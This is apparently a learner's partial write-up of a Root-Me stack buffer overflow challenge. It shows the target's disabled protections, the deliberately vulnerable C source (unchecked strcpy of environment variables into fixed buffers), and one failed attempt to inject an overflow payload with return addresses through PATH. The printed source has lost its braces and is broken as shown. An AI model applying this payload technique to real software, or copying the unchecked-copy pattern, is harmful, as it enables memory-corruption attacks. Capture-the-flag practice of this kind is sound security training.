ELF x86: Stack buffer overflow basic 4

root-me challenge: Can you return the env to me pleazzz?

Environment configuration:

PIE 	Position Independent Executable 	 No 
RelRO 	Read Only relocations 	                 No 
NX 	Non-Executable Stack 	                 No 
ASLR 	Address Space Layout Randomization 	 No 
SF 	Source Fortification 	                 No 
SSP 	Stack-Smashing Protection 	         No 
SRC 	Source code access 	                 Yes 

Source code:

#include <stdio.h>
#include <stdlib.h>
#include <dirent.h>
#include <string.h>
struct EnvInfo
  char home[128];
  char username[128];
  char shell[128];  
  char path[128];  
struct EnvInfo GetEnv(void)
  struct EnvInfo env;
  char *ptr;
  if((ptr = getenv("HOME")) == NULL)
      printf("[-] Can't find HOME.\n");
  strcpy(env.home, ptr);
  if((ptr = getenv("USERNAME")) == NULL)
      printf("[-] Can't find USERNAME.\n");
  strcpy(env.username, ptr);
  if((ptr = getenv("SHELL")) == NULL)
      printf("[-] Can't find SHELL.\n");
  strcpy(env.shell, ptr);
  if((ptr = getenv("PATH")) == NULL)
      printf("[-] Can't find PATH.\n");
  strcpy(env.path, ptr);
  return env;
int main(void)
  struct EnvInfo env;
  printf("[+] Getting env...\n");
  env = GetEnv();
  printf("HOME     = %s\n", env.home);
  printf("USERNAME = %s\n", env.username);
  printf("SHELL    = %s\n", env.shell);
  printf("PATH     = %s\n", env.path);
  return 0;  

app-systeme-ch8@challenge02:~$ export PATH=$PATH:`python -c "print 'A'*160 + '\x31\xf9\xff\xbf' + '\x2b\xfb\xff\xbf'"`
app-systeme-ch8@challenge02:~$ ./ch8
[+] Getting env...
[-] Can't find USERNAME.

Need to think some more …